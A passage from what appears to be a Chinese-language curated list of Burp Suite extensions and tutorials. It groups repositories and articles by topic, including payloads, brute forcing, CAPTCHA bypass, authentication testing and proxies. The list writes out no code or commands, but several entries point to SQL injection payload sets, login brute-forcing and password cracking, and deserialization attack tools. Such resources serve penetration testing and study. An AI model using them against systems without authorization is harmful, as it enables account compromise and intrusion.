[romanzaikin/burpextension-whatsapp-decryption-checkpoint](https://github.com/romanzaikin/burpextension-whatsapp-decryption-checkpoint) Burp extension to decrypt WhatsApp Protocol - [**251**星][2y] [Java] [nccgroup/burpsuiteloggerplusplus](https://github.com/nccgroup/burpsuiteloggerplusplus) Burp Suite Logger++: Log activities of all the tools in Burp Suite - [**97**星][2y] [Py] [debasishm89/burpy](https://github.com/debasishm89/burpy) parses Burp Suite log and performs various tests depending on the module provided and finally generate a HTML report. - [**66**星][4y] [Py] [tony1016/burplogfilter](https://github.com/tony1016/burplogfilter) A python3 program to filter Burp Suite log file. - [**43**星][1y] [Py] [bayotop/sink-logger](https://github.com/bayotop/sink-logger) Burp扩展,无缝记录所有传递到已知JavaScript sinks的数据 - [**35**星][25d] [Java] [righettod/log-requests-to-sqlite](https://github.com/righettod/log-requests-to-sqlite) BURP extension to record every HTTP request send via BURP and create an audit trail log of an assessment. - [**5**星][7m] [Java] [logicaltrust/burphttpmock](https://github.com/logicaltrust/burphttpmock) This Burp extension provides mock responses based on the real ones. - [**3**星][1y] [Java] [ax/burp-logs](https://github.com/ax/burp-logs) Logs is a Burp Suite extension to work with log files. - [**0**星][3y] [Java] [silentsignal/burp-sqlite-logger](https://github.com/silentsignal/burp-sqlite-logger) SQLite logger for Burp Suite - 重复区段: [SQL->工具](#b90695c04ef9e0a788a2aa07dec6f2b5) | # <a id="fc5f535e219ba9694bb72df4c11b32bd"></a>Payload *** ## <a id="aa76bde443edd8ef5b7af7e0fcab354e"></a>工具 - [**441**星][9d] [Java] [bit4woo/recaptcha](https://github.com/bit4woo/recaptcha) 自动识别图形验证码并用于burp intruder爆破模块的插件 - [**156**星][2m] [trietptm/sql-injection-payloads](https://github.com/trietptm/sql-injection-payloads) SQL Injection Payloads for Burp Suite, OWASP Zed Attack Proxy,... - 重复区段: [SQL->工具](#b90695c04ef9e0a788a2aa07dec6f2b5) | - [**74**星][2y] [Java] [ikkisoft/bradamsa](https://github.com/ikkisoft/bradamsa) Burp Suite extension to generate Intruder payloads using Radamsa - [**60**星][1y] [Py] [destine21/zipfileraider](https://github.com/destine21/zipfileraider) ZIP File Raider - Burp Extension for ZIP File Payload Testing - [**55**星][2y] [Java] [righettod/virtualhost-payload-generator](https://github.com/righettod/virtualhost-payload-generator) BURP extension providing a set of values for the HTTP request "Host" header for the "BURP Intruder" in order to abuse virtual host resolution. - [**34**星][11d] [tdifg/payloads](https://github.com/tdifg/payloads) for burp - [**20**星][4m] [thehackingsage/burpsuite](https://github.com/thehackingsage/burpsuite) BurpSuite Pro, Plugins and Payloads - [**19**星][5y] [Java] [lgrangeia/aesburp](https://github.com/lgrangeia/aesburp) Burp Extension to manipulate AES encrypted payloads - [**12**星][3m] [Java] [tmendo/burpintruderfilepayloadgenerator](https://github.com/tmendo/burpintruderfilepayloadgenerator) Burp Intruder File Payload Generator - [**10**星][2y] [antichown/burp-payloads](https://github.com/antichown/burp-payloads) Burp Payloads - [**5**星][4y] [Java] [antoinet/burp-decompressor](https://github.com/antoinet/burp-decompressor) An extension for BurpSuite used to access and modify compressed HTTP payloads without changing the content-encoding. - [**5**星][5y] [Py] [enablesecurity/burp-luhn-payload-processor](https://github.com/enablesecurity/burp-luhn-payload-processor) A plugin for Burp Suite Pro to work with attacker payloads and automatically generate check digits for credit card numbers and similar numbers that end with a check digit generated using the Luhn algorithm or formula (also known as the "modulus 10" or "mod 10" algorithm). - [**3**星][7y] [Py] [infodel/burp.extension-payloadparser](https://github.com/infodel/burp.extension-payloadparser) Burp Extension for parsing payloads containing/excluding characters you provide. - [**3**星][2y] [Java] [pan-lu/recaptcha](https://github.com/pan-lu/recaptcha) A Burp Extender that auto recognize CAPTCHA and use for Intruder payload *** ## <a id="82355d06762a967f22a906864b7e1a39"></a>文章 - 2018.02 [hackingarticles] [Payload Processing Rule in Burp suite (Part 2)](http://www.hackingarticles.in/payload-processing-rule-burp-suite-part-2/) - 2018.02 [hackingarticles] [Payload Processing Rule in Burp suite (Part 1)](http://www.hackingarticles.in/payload-processing-rule-burp-suite-part-1/) - 2018.01 [hackingarticles] [Beginners Guide to Burpsuite Payloads (Part 2)](http://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-2/) - 2018.01 [hackingarticles] [Beginners Guide to Burpsuite Payloads (Part 1)](http://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/) - 2012.10 [freebuf] [Burp Suite PayLoad下载](http://www.freebuf.com/sectool/6017.html) # <a id="b4b2acd195a5a5fb6c44ca011fcd3c71"></a>开发与调试 *** ## <a id="846faac18fb6ee281aac739c032454ea"></a>工具 - [**150**星][3y] [Java] [mwielgoszewski/jython-burp-api](https://github.com/mwielgoszewski/jython-burp-api) Develop Burp extensions in Jython - [**90**星][11m] [Java] [doyensec/burpdeveltraining](https://github.com/doyensec/burpdeveltraining) Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security Automation" *** ## <a id="f74e4fb5d2e05b88f1f1b59a7ecf4094"></a>文章 - 2020.01 [aliyun] [打造高度自定义的渗透工具-Burp插件开发(一)](https://xz.aliyun.com/t/7065) - 2019.12 [parsiya] [Developing and Debugging Java Burp Extensions with Visual Studio Code](https://parsiya.net/blog/2019-12-02-developing-and-debugging-java-burp-extensions-with-visual-studio-code/) - 2019.01 [freebuf] [详细讲解 | 利用python开发Burp Suite插件(二)](https://www.freebuf.com/articles/web/193950.html) - 2019.01 [freebuf] [详细讲解 | 利用python开发Burp Suite插件(一)](https://www.freebuf.com/news/193657.html) - 2019.01 [4hou] [利用Python编写具有加密和解密功能的Burp插件 (下)](http://www.4hou.com/technology/15502.html) - 2019.01 [4hou] [利用Python编写具有加密和解密功能的Burp插件 (上)](http://www.4hou.com/technology/15501.html) - 2017.05 [elearnsecurity] [Developing Burp Suite Extensions](https://blog.elearnsecurity.com/developing-burp-suite-extensions.html) - 2017.01 [polaris] [BurpSuite插件开发Tips:请求响应参数的AES加解密](http://polaris-lab.com/index.php/archives/40/) - 2016.06 [freebuf] [BurpSuite插件开发Tips:请求响应参数的AES加解密](http://www.freebuf.com/articles/terminal/106673.html) - 2016.04 [freebuf] [Burpsuite插件开发(二):信息采集插件](http://www.freebuf.com/sectool/102673.html) - 2016.02 [xxlegend] [Burpsuite 插件开发之RSA加解密](http://xxlegend.com/2016/02/01/Burpsuite插件开发之RSA加解密/) - 2016.02 [xxlegend] [Burpsuite 插件开发之RSA加解密](http://xxlegend.com/2016/02/01/Burpsuite插件开发之RSA加解密/) - 2016.01 [freebuf] [Burpsuite插件开发之RSA加解密](http://www.freebuf.com/articles/security-management/92376.html) - 2015.12 [nsfocus] [Burpsuite插件开发之RSA加解密](http://blog.nsfocus.net/burpsuite-plugin-development-rsa-encryption-decryption/) - 2015.05 [netspi] [Debugging Burp Extensions](https://blog.netspi.com/debugging-burp-extensions/) - 2014.01 [sethsec] [Writing and Debugging BurpSuite Extensions in Python](https://sethsec.blogspot.com/2014/01/writing-and-debugging-burpsuite.html) - 2013.12 [freebuf] [Java编写代理服务器(Burp拦截Demo)一](http://www.freebuf.com/articles/web/21832.html) - 2012.07 [console] [Setting up a Burp development environment](http://console-cowboys.blogspot.com/2012/07/setting-up-burp-development-environment.html) # <a id="98d0bee1e766dc5d225fefc3fa6dc3db"></a>爆破 *** ## <a id="5cf783bf4e7456b09cb04c4ffe65492c"></a>工具 - [**291**星][3m] [Java] [c0ny1/jsencrypter](https://github.com/c0ny1/jsencrypter) 一个用于加密传输爆破的Burp Suite插件 - [**247**星][13d] [Py] [teag1e/burpcollector](https://github.com/teag1e/burpcollector) 通过BurpSuite来构建自己的爆破字典,可以通过字典爆破来发现隐藏资产。 - [**198**星][9m] [Py] [thekingofduck/burpfakeip](https://github.com/thekingofduck/burpfakeip) 一个用于伪造ip地址进行爆破的Burp Suite插件 - [**128**星][2m] [cujanovic/content-bruteforcing-wordlist](https://github.com/cujanovic/content-bruteforcing-wordlist) Wordlist for content(directory) bruteforce discovering with Burp or dirsearch *** ## <a id="f455d68fb029359c7b018c50af299bed"></a>文章 - 2019.09 [BrokenSecurity] [036 part of Ethical Hacking - Burpsuite login bruteforce](https://www.youtube.com/watch?v=b1ggBAk2yDE) - 2018.06 [bugbountywriteup] [How to brute force efficiently without Burp Pro](https://medium.com/p/1bb2a414a09f) - 2018.03 [HackerSploit] [Web App Penetration Testing - #3 - Brute Force Attacks With Burp Suite](https://www.youtube.com/watch?v=cL9NsXpUqYI) - 2016.09 [hackingarticles] [Brute Force Website Login Page using Burpsuite (Beginner Guide)](http://www.hackingarticles.in/brute-force-website-login-page-using-burpsuite-beginner-guide/) - 2012.12 [pentestlab] [Brute Force Attack With Burp](https://pentestlab.blog/2012/12/21/brute-force-attack-with-burp/) # <a id="d1ddcb393c7ba81ecc74f18bbad711e1"></a>验证码 *** ## <a id="f0622d00c931cf67b524a13972f5bcdc"></a>工具 - [**85**星][2m] [Java] [c0ny1/captcha-killer](https://github.com/c0ny1/captcha-killer) burp验证码识别接口调用插件 *** ## <a id="b385afb89d80f203553bf8e0ef26d997"></a>文章 - 2018.04 [freebuf] [实现一个简单的Burp验证码本地识别插件](http://www.freebuf.com/articles/web/168679.html) - 2012.01 [idontplaydarts] [Extending Burp Suite to solve reCAPTCHA](https://www.idontplaydarts.com/2012/01/extending-burp-suite-to-solve-recaptcha/) # <a id="3cc7b91da90b8f1a33d2ea14511332ef"></a>编码/解码 *** ## <a id="ed0af60dcbdf5f3efab33d1cc4c1e4ea"></a>工具 - [**121**星][3m] [Java] [nccgroup/decoder-improved](https://github.com/nccgroup/decoder-improved) Improved decoder for Burp Suite - [**83**星][6y] [Py] [mwielgoszewski/burp-protobuf-decoder](https://github.com/mwielgoszewski/burp-protobuf-decoder) A simple Google Protobuf Decoder for Burp - [**77**星][1y] [Java] [bit4woo/u2c](https://github.com/bit4woo/u2c) Unicode编码转中文的burp插件 - [**68**星][3y] [Py] [stayliv3/burpsuite-changeu](https://github.com/stayliv3/burpsuite-changeu) burpsuite 插件。将返回值中的unicode明文 - [**36**星][9y] [C#] [gdssecurity/wcf-binary-soap-plug-in](https://github.com/gdssecurity/wcf-binary-soap-plug-in) a Burp Suite plug-in designed to encode and decode WCF Binary Soap request and response data ("Content-Type: application/soap+msbin1) - [**25**星][12m] [Kotlin] [gosecure/burp-ntlm-challenge-decoder](https://github.com/gosecure/burp-ntlm-challenge-decoder) Burp extension to decode NTLM SSP headers and extract domain/host information - [**25**星][4y] [Java] [pokeolaf/pokemongodecoderforburp](https://github.com/pokeolaf/pokemongodecoderforburp) A simpe decoder to decode requests/responses made by PokemonGo in burp - [**2**星][2y] [Java] [matanatr96/decoderproburpsuite](https://github.com/matanatr96/decoderproburpsuite) Burp Suite Plugin to decode and clean up garbage response text - [**0**星][2y] [Java] [adityachaudhary/phantom-cryptor](https://github.com/adityachaudhary/phantom-cryptor) Burp Suite extender to encrypt requests and decrypt response. - [**0**星][4y] [Java] [luj1985/albatross](https://github.com/luj1985/albatross) XML Fast Infoset decoder for Burp Suite *** ## <a id="cc4e4bfbe3ffd7c40e714532bf19f7d5"></a>文章 - 2018.01 [hackingarticles] [Burpsuite Encoder & Decoder Tutorial](http://www.hackingarticles.in/burpsuite-encoder-decoder-tutorial/) - 2017.03 [HackingMonks] [Encoding and Decoding (Burp Suite Decoder)](https://www.youtube.com/watch?v=8FMdEGDShmw) # <a id="e73752a0766067683f58fba20e2a3940"></a>认证/登录 *** ## <a id="4230c7dcb571d29a706e9b753d5644e6"></a>工具 - [**350**星][20d] [Py] [securityinnovation/authmatrix](https://github.com/securityinnovation/authmatrix) AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services. - [**295**星][1m] [Py] [quitten/autorize](https://github.com/quitten/autorize) Automatic authorization enforcement detection extension for burp suite written in Jython in order to ease application security people work and allow them perform an automatic authorization tests - [**74**星][6m] [Java] [nccgroup/berserko](https://github.com/nccgroup/berserko) Burp Suite extension to perform Kerberos authentication - [**40**星][7y] [Java] [wuntee/burpauthzplugin](https://github.com/wuntee/burpauthzplugin) Burp plugin to test for authorization flaws - [**9**星][1y] [Java] [sampsonc/authheaderupdater](https://github.com/sampsonc/authheaderupdater) Burp extension to specify the token value for the Authenication header while scanning. - [**0**星][2y] [Java] [insighti/burpamx](https://github.com/insighti/burpamx) AMX Authorization Burp Suite Extension *** ## <a id="eb559564a0c8ca1a92679f16198fdb52"></a>文章 - 2018.11 [vanimpe] [Hunt for devices with default passwords (with Burp)](https://www.vanimpe.eu/2018/11/12/hunt-for-devices-with-default-passwords-with-burp/) - 2018.06 [hackers] [Online Password Cracking with THC-Hydra and BurpSuite](https://www.hackers-arise.com/single-post/2018/06/21/Online-Password-Cracking-with-THC-Hydra-and-BurpSuite) - 2018.02 [hackers] [Online Password Cracking with THC-Hydra and Burp Suite](https://www.hackers-arise.com/single-post/2018/02/26/Online-Password-Cracking-with-THC-Hydra-and-Burp-Suite) - 2017.10 [TechnoHacker] [How to Crack Logins with Burp Suite](https://www.youtube.com/watch?v=SCHEBItZkdo) - 2017.08 [avleonov] [Burp Suite Free Edition and NTLM authentication in ASP.net applications](https://avleonov.com/2017/08/29/burp-suite-free-edition-and-ntlm-authentication-in-asp-net-applications/) - 2017.05 [4hou] [NTLM认证失效时,如何使用Fiddler配合Burp Suite进行渗透测试?](http://www.4hou.com/technology/4797.html) - 2017.05 [mediaservice] [NTLM认证失效时,如何使用Fiddler配合Burp Suite进行渗透测试?](https://techblog.mediaservice.net/2017/05/fiddler-ntlm-authentication-when-burp-suite-fails/) - 2016.12 [hackers] [Web App Hacking: Hacking Form Authentication with Burp Suite](https://www.hackers-arise.com/single-post/2016/12/05/Web-App-Hacking-Hacking-Form-Authentication-with-Burp-Suite) - 2015.09 [NetSecNow] [How To: Brute Forcing website logins with Hydra and Burpsuite in Kali Linux 2.0](https://www.youtube.com/watch?v=AEfKJ122BMg) - 2014.02 [silentsignal] [Testing websites using ASP.NET Forms Authentication with Burp Suite](https://blog.silentsignal.eu/2014/02/20/testing-websites-using-asp-net-forms-auth-with-burp-suite/) # <a id="9dd6a1c90cad20f451e9ba643c6e1b4b"></a>Brida *** ## <a id="1b569f5d261711d2ed5426e9c91d1326"></a>工具 - [**609**星][1y] [Java] [federicodotta/brida](https://github.com/federicodotta/brida) The new bridge between Burp Suite and Frida! *** ## <a id="885ed46edb670875c073a1bd89684da8"></a>文章 - 2019.01 [pediy] [[原创]Brida操作指南](https://bbs.pediy.com/thread-248977.htm) - 2018.04 [mediaservice] [Brida用户指南](https://techblog.mediaservice.net/2018/04/brida-a-step-by-step-user-guide/) - 2017.10 [mediaservice] [Advanced mobile penetration testing with Brida – Slides HackInBo 2017 WE](https://techblog.mediaservice.net/2017/10/advanced-mobile-penetration-testing-with-brida-slides-hackinbo-2017-we/) - 2017.08 [freebuf] [Brida:使用Frida进行移动应用渗透测试](http://www.freebuf.com/sectool/143360.html) - 2017.08 [360] [联合Frida和BurpSuite的强大扩展--Brida](https://www.anquanke.com/post/id/86567/) - 2017.08 [4hou] [Brida:将frida与burp结合进行移动app渗透测试](http://www.4hou.com/penetration/6916.html) - 2017.07 [mediaservice] [Brida 实战](https://techblog.mediaservice.net/2017/07/brida-advanced-mobile-application-penetration-testing-with-frida/) - 2017.01 [freebuf] [使用Frida配合Burp Suite追踪API调用](http://www.freebuf.com/articles/web/125260.html) # <a id="f68c8a913de4484c516af41948da1776"></a>代理 *** ## <a id="0f1ed20665c333e6230506e95b893575"></a>工具 - [**919**星][3y] [Java] [summitt/burp-non-http-extension](https://github.com/summitt/burp-non-http-extension) Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite. - [**354**星][2y] [Shell] [koenbuyens/kalirouter](https://github.com/koenbuyens/kalirouter) 将 KaliLinux 主机转变为路由器,使用 Wireshark 记录所有的网络流量,同时将 HTTP/HTTPS 流量发送到其他主机的拦截代理(例如 BurpSuite) - [**318**星][1m] [Java] [ilmila/j2eescan](https://github.com/ilmila/j2eescan) a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications. - [**253**星][2y] [Java] [portswigger/collaborator-everywhere](https://github.com/portswigger/collaborator-everywhere) Burp Suite 扩展,通过注入非侵入性 headers 来增强代理流量,通过引起 Pingback 到 Burp Collaborator 来揭露后端系统 - [**230**星][1y] [Py] [audibleblink/doxycannon](https://github.com/audibleblink/doxycannon) 为一堆OpenVPN文件分别创建Docker容器, 每个容器开启SOCKS5代理服务器并绑定至Docker主机端口, 再结合使用Burp或ProxyChains, 构建私有的Botnet - [**151**星][7m] [Py] [kacperszurek/burp_wp](https://github.com/kacperszurek/burp_wp) Find known vulnerabilities in WordPress plugins and themes using Burp Suite proxy. WPScan like plugin for Burp. - [**89**星][8m] [Java] [rub-nds/burpssoextension](https://github.com/rub-nds/burpssoextension) An extension for BurpSuite that highlights SSO messages in Burp's proxy window.. - [**73**星][10d] [Py] [jiangsir404/pbscan](https://github.com/jiangsir404/pbscan) 基于burpsuite headless 的代理式被动扫描系统 - [**71**星][4m] [Java] [static-flow/burpsuite-team-extension](https://github.com/static-flow/burpsuite-team-extension) This Burpsuite plugin allows for multiple web app testers to share their proxy history with each other in real time. Requests that comes through your Burpsuite instance will be replicated in the history of the other testers and vice-versa! - [**49**星][2y] [Py] [mrschyte/socksmon](https://github.com/mrschyte/socksmon) 使用 BURP 或 ZAP 的 TCP 拦截代理 - [**27**星][2y] [Py] [mrts/burp-suite-http-proxy-history-converter](https://github.com/mrts/burp-suite-http-proxy-history-converter) Python script that converts Burp Suite HTTP proxy history files to CSV or HTML - [**26**星][8m] [Java] [static-flow/directoryimporter](https://github.com/static-flow/directoryimporter) a Burpsuite plugin built to enable you to import your directory bruteforcing results into burp for easy viewing later. This is an alternative to proxying bruteforcing tools through burp to catch the results. - [**13**星][1y] [Java] [retanoj/burpmultiproxy](https://github.com/retanoj/burpmultiproxy) Burpsuite 切换代理插件 - [**11**星][4y] [Py] [vincd/burpproxypacextension](https://github.com/vincd/burpproxypacextension) Exemple d'extension Burp permettant d'utiliser les fichiers de configuration de proxy PAC - [**5**星][3y] [Java] [mrts/burp-suite-http-proxy-history-viewer](https://github.com/mrts/burp-suite-http-proxy-history-viewer) Burp Suite HTTP proxy history viewer - [**5**星][3y] [Java] [netspi/jsws](https://github.com/netspi/jsws) JavaScript Web Service Proxy Burp Plugin - [**3**星][2y] [Kotlin] [pajswigger/filter-options](https://github.com/pajswigger/filter-options) Burp extension to filter OPTIONS requests from proxy history - [**2**星][1y] [Java] [coastalhacking/burp-pac](https://github.com/coastalhacking/burp-pac) Burp Proxy Auto-config Extension *** ## <a id="5118294d10a7809bd295221e6c078804"></a>文章 - 2019.06 [NetworkHeros] [Bug Bounty : BurpSuite Professional v2.0.11 Free and Set up for Proxy Intercept](https://www.youtube.com/watch?v=m7o-qIYzLt0) - 2019.04 [parsiya] [Hiding OPTIONS - An Adventure in Dealing with Burp Proxy in an Extension](https://parsiya.net/blog/2019-04-06-hiding-options-an-adventure-in-dealing-with-burp-proxy-in-an-extension/) - 2018.10 [valerio] [MITM using arpspoof + Burp or mitmproxy on Kali Linux](https://medium.com/p/95213ff60304) - 2018.06 [NetworkHeros] [Ethical Hacking (CEHv10): BurpSuite install and configure proxy](https://www.youtube.com/watch?v=tK_nCYWbbOc) - 2017.04 [360] [BurpSuite 代理设置的小技巧](https://www.anquanke.com/post/id/85925/) - 2017.04 [blackhillsinfosec] [Using Burp with ProxyCannon](https://www.blackhillsinfosec.com/using-burp-proxycannon/) - 2017.02 [polaris] [使用BurpSuite攻击JavaScript Web服务代理](http://polaris-lab.com/index.php/archives/150/) - 2017.02 [freebuf] [使用Burpsuite代理和pypcap抓包进行抢红包的尝试](http://www.freebuf.com/sectool/125969.html) - 2016.08 [] [Configuring Google Chrome to Proxy Through Burp Suite](https://www.4armed.com/blog/google-chrome-proxy-through-burp-suite/) - 2016.04 [freebuf] [针对非Webapp测试的Burp技巧(一):拦截和代理监听](http://www.freebuf.com/articles/terminal/100908.html) - 2016.04 [parsiya] [Thick Client Proxying - Part 4: Burp in Proxy Chains](https://parsiya.net/blog/2016-04-07-thick-client-proxying---part-4-burp-in-proxy-chains/) - 2016.04 [parsiya] [Thick Client Proxying - Part 4: Burp in Proxy Chains](https://parsiya.net/blog/2016-04-07-thick-client-proxying-part-4-burp-in-proxy-chains/) - 2016.04 [parsiya] [Thick Client Proxying - Part 3: Burp Options and Extender](https://parsiya.net/blog/2016-04-02-thick-client-proxying---part-3-burp-options-and-extender/) - 2016.04 [parsiya] [Thick Client Proxying - Part 3: Burp Options and Extender](https://parsiya.net/blog/2016-04-02-thick-client-proxying-part-3-burp-options-and-extender/) - 2016.03 [parsiya] [Thick Client Proxying - Part 1: Burp Interception and Proxy Listeners](https://parsiya.net/blog/2016-03-27-thick-client-proxying---part-1-burp-interception-and-proxy-listeners/) - 2016.03 [parsiya] [Thick Client Proxying - Part 1: Burp Interception and Proxy Listeners](https://parsiya.net/blog/2016-03-27-thick-client-proxying-part-1-burp-interception-and-proxy-listeners/) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 03 - Proxy Module](https://www.youtube.com/watch?v=PDTwYFkjQBE) - 2015.12 [jerrygamblin] [Proxying BurpSuite through TOR](https://jerrygamblin.com/2015/12/18/proxying-burpsuite-through-tor/) - 2015.10 [parsiya] [Proxying Hipchat Part 2: So You Think You Can Use Burp?](https://parsiya.net/blog/2015-10-09-proxying-hipchat-part-2-so-you-think-you-can-use-burp/) - 2014.01 [nvisium] [Intro To Burp Suite Part I: Setting Up BurpSuite with Firefox and FoxyProxy](https://nvisium.com/blog/2014/01/10/setting-up-burpsuite-with-firefox-and/) - 2013.05 [] [Burp Suite处理“不支持代理”的客户端](http://www.91ri.org/5976.html) - 2013.01 [rapid7] [Video Tutorial: Introduction to Burp-Suite 1.5 Web Pen Testing Proxy](https://blog.rapid7.com/2013/01/15/video-tutorial-introduction-to-burp-suite-15-web-pen-testing-proxy/) # <a id="b431101397ce332c0afabdc990dac191"></a>域/子域 *** ## <a id="08b61ea39352bc958f978412f7d361c5"></a>工具 - [**383**星][1m] [Java] [bit4woo/domain_hunter](https://github.com/bit4woo/domain_hunter) 利用burp收集整个企业、组织的域名(不仅仅是单个主域名)的插件 - [**147**星][8m] [Py] [codingo/minesweeper](https://github.com/codingo/minesweeper) A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking). - [**133**星][4m] [Py] [prodigysml/dr.-watson](https://github.com/prodigysml/dr.-watson) a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! - [**17**星][4m] [Java] [phefley/burp-javascript-security-extension](https://github.com/phefley/burp-javascript-security-extension) A Burp Suite extension which performs checks for cross-domain scripting against the DOM, subresource integrity checks, and evaluates JavaScript resources against threat intelligence data. *** ## <a id="983c455cb35f2960af743452b8495414"></a>文章 - 2018.05 [pentestingexperts] [Minesweeper – A Burpsuite plugin (BApp) to aid in the detection of cryptocurrency mining domains (cryptojacking)](http://www.pentestingexperts.com/minesweeper-a-burpsuite-plugin-bapp-to-aid-in-the-detection-of-cryptocurrency-mining-domains-cryptojacking/) # <a id="39e9a0fe929fffe5721f7d7bb2dae547"></a>工具 *** ## <a id="5b761419863bc686be12c76451f49532"></a>新添加 - [**740**星][1y] [Java] [d3vilbug/hackbar](https://github.com/d3vilbug/hackbar) HackBar plugin for Burpsuite - [**622**星][11m] [Java] [c0ny1/chunked-coding-converter](https://github.com/c0ny1/chunked-coding-converter) Burp suite 分块传输辅助插件 - [**383**星][3y] [Py] [0x4d31/burpa](https://github.com/0x4d31/burpa) A Burp Suite Automation Tool with Slack Integration. It can be used with Jenkins and Selenium to automate Dynamic Application Security Testing (DAST). - [**377**星][4y] [JS] [allfro/burpkit](https://github.com/allfro/burpkit) Next-gen BurpSuite penetration testing tool - [**364**星][2m] [Java] [bit4woo/knife](https://github.com/bit4woo/knife) A burp extension that add some useful function to Context Menu 添加一些右键菜单让burp用起来更顺畅 - [**342**星][3y] [Py] [pathetiq/burpsmartbuster](https://github.com/pathetiq/burpsmartbuster) A Burp Suite content discovery plugin that add the smart into the Buster! - [**315**星][1y] [Java] [ebryx/aes-killer](https://github.com/ebryx/aes-killer) Burp plugin to decrypt AES Encrypted traffic of mobile apps on the fly - [**241**星][4m] [Java] [samlraider/samlraider](https://github.com/samlraider/samlraider) SAML2 Burp Extension - [**223**星][14d] [Java] [lilifengcode/burpsuite-plugins-usage](https://github.com/lilifengcode/burpsuite-plugins-usage) Burpsuite-Plugins-Usage - [**164**星][7m] [Java] [netspi/javaserialkiller](https://github.com/netspi/javaserialkiller) Burp extension to perform Java Deserialization Attacks - [**164**星][3m] [Py] [regala/burp-scope-monitor](https://github.com/regala/burp-scope-monitor) Burp Suite Extension to monitor new scope - [**160**星][1y] [Py] [bayotop/off-by-slash](https://github.com/bayotop/off-by-slash) Bupr扩展, 检测利用Nginx错误配置导致的重名遍历(alias traversal) - [**151**星][6m] [Java] [netsoss/headless-burp](https://github.com/netsoss/headless-burp) Automate security tests using Burp Suite. - [**138**星][2y] [Java] [netspi/wsdler](https://github.com/netspi/wsdler) WSDL Parser extension for Burp - [**131**星][9m] [Go] [empijei/wapty](https://github.com/empijei/wapty) Go语言编写的Burp的替代品。(已不再维护) - [**124**星][4y] [Py] [moloch--/csp-bypass](https://github.com/moloch--/csp-bypass) A Burp Plugin for Detecting Weaknesses in Content Security Policies - [**119**星][7y] [Py] [meatballs1/burp-extensions](https://github.com/meatballs1/burp-extensions) Burp Suite Extensions - [**112**星][13d] [Java] [x-ai/burpunlimitedre](https://github.com/x-ai/burpunlimitedre) This project !replace! BurpUnlimited of depend (BurpSutie version 1.7.27). It is NOT intended to replace them! - [**105**星][4m] [Java] [netspi/burp-extensions](https://github.com/netspi/burp-extensions) Central Repo for Burp extensions - [**104**星][2y] [Java] [clr2of8/gathercontacts](https://github.com/clr2of8/gathercontacts) A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results - [**103**星][9m] [Py] [kibodwapon/noeye](https://github.com/kibodwapon/noeye) A blind mode exploit framework (a dns server and a web app) that like wvs's AcuMonitor Service or burpsuite's collabrator or cloudeye - [**103**星][4y] [Java] [summitt/burp-ysoserial](https://github.com/summitt/burp-ysoserial) YSOSERIAL Integration with burp suite - [**90**星][3y] [Java] [dobin/burpsentinel](https://github.com/dobin/burpsentinel) GUI Burp Plugin to ease discovering of security holes in web applications - [**89**星][9m] [Py] [lopseg/jsdir](https://github.com/Lopseg/Jsdir) a Burp Suite extension that extracts hidden paths from js files and beautifies it for further reading. - [**88**星][1y] [Py] [nccgroup/blackboxprotobuf](https://github.com/nccgroup/blackboxprotobuf) Blackbox protobuf is a Burp Suite extension for decoding and modifying arbitrary protobuf messages without the protobuf type definition. - [**88**星][2y] [Java] [silentsignal/burp-image-size](https://github.com/silentsignal/burp-image-size) Image size issues plugin for Burp Suite - [**86**星][20d] [Py] [leoid/matchandreplace](https://github.com/leoid/matchandreplace) Match and Replace script used to automatically generate JSON option file to BurpSuite - [**85**星][1m] [Go] [root4loot/rescope](https://github.com/root4loot/rescope) defining scopes for Burp Suite and OWASP ZAP. - [**84**星][3m] [Java] [jgillam/burp-paramalyzer](https://github.com/jgillam/burp-paramalyzer) Burp extension for parameter analysis of large-scale web application penetration tests. - [**84**星][2y] [Java] [yandex/burp-molly-pack](https://github.com/yandex/burp-molly-pack) Security checks pack for Burp Suite - [**73**星][6y] [Java] [irsdl/burpsuitejsbeautifier](https://github.com/irsdl/burpsuitejsbeautifier) Burp Suite JS Beautifier - [**73**星][2y] [Java] [spiderlabs/burplay](https://github.com/spiderlabs/burplay) a Burp Extension allowing for replaying any number of requests using same modifications definition. Its main purpose is to aid in searching for Privilege Escalation issues. - [**70**星][30d] [Py] [ziirish/burp-ui](https://github.com/ziirish/burp-ui) a web-ui for burp backup written in python with Flask and jQuery/Bootstrap - [**69**星][5m] [Java] [aress31/swurg](https://github.com/aress31/swurg) Parse OpenAPI documents into Burp Suite for automating OpenAPI-based APIs security assessments - [**65**星][2y] [Py] [markclayton/bumpster](https://github.com/markclayton/bumpster) The Unofficial Burp Extension for DNSDumpster.com - [**58**星][1y] [Java] [portswigger/replicator](https://github.com/portswigger/replicator) Burp extension to help developers replicate findings from pen tests - [**58**星][6y] [Java] [spiderlabs/burpnotesextension](https://github.com/spiderlabs/burpnotesextension) a plugin for Burp Suite that adds a Notes tab. The tool aims to better organize external files that are created during penetration testing. - [**48**星][2y] [java] [anbai-inc/burpstart](https://github.com/anbai-inc/burpstart) Burp 启动加载器 - [**48**星][2y] [Java] [inode-/attackselector](https://github.com/inode-/attackselector) Burp Suite Attack Selector Plugin - [**47**星][3m] [Py] [hvqzao/report-ng](https://github.com/hvqzao/report-ng) Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base. - [**46**星][1y] [Py] [br3akp0int/gqlparser](https://github.com/br3akp0int/gqlparser) A repository for GraphQL Extension for Burp Suite - [**46**星][1y] [Java] [secdec/attack-surface-detector-burp](https://github.com/secdec/attack-surface-detector-burp) The Attack Surface Detector uses static code analyses to identify web app endpoints by parsing routes and identifying parameters - [**45**星][1y] [Go] [joanbono/gurp](https://github.com/joanbono/gurp) Burp Commander written in Go - [**41**星][1y] [Py] [zynga/hiccup](https://github.com/zynga/hiccup) [DEPRECATED] Hiccup is a framework that allows the Burp Suite (a web application security testing tool, - [**41**星][1y] [Java] [tijme/similar-request-excluder](https://github.com/tijme/similar-request-excluder) A Burp Suite extension that automatically marks similar requests as 'out-of-scope'. - [**41**星][12m] [PHP] 